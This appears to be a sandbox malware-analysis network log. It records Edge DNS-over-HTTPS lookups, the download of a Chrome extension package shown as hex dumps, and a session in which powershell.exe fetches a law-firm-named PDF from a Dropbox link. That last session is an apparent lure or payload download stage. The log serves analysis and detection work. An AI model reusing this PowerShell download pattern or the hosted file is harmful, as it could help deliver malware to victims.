                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Content-Length: 138356
                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                  Expires: Wed, 10 Dec 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                  Age: 3398
                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                  ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC821INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83
                                                                                                                                                                                                                                                                                  Data Ascii: _q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\|=
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8
                                                                                                                                                                                                                                                                                  Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26
                                                                                                                                                                                                                                                                                  Data Ascii: 6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5
                                                                                                                                                                                                                                                                                  Data Ascii: Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4
                                                                                                                                                                                                                                                                                  Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea
                                                                                                                                                                                                                                                                                  Data Ascii: hKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98
                                                                                                                                                                                                                                                                                  Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65
                                                                                                                                                                                                                                                                                  Data Ascii: 9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  8192.168.2.449758172.64.41.34437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8eff06e0fcd1421b-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom(c)


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  9192.168.2.449760172.64.41.34437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8eff06e0fdd1c352-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 26 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom&A)


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  10192.168.2.449757162.159.61.34437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8eff06e0fe4242d8-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 b7 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  11192.168.2.449753162.125.69.184438592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC246OUTGET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hell [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com/cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MzAzNjAwOTI3NjQwNzM2NjQwMDkzMjEwNTE4NzIzNDU4Mjk3MTc4; Path=/; Expires=Sun, 09 Dec 2029 17:41:38 GMT; HttpOnly; Secure; SameSite=None
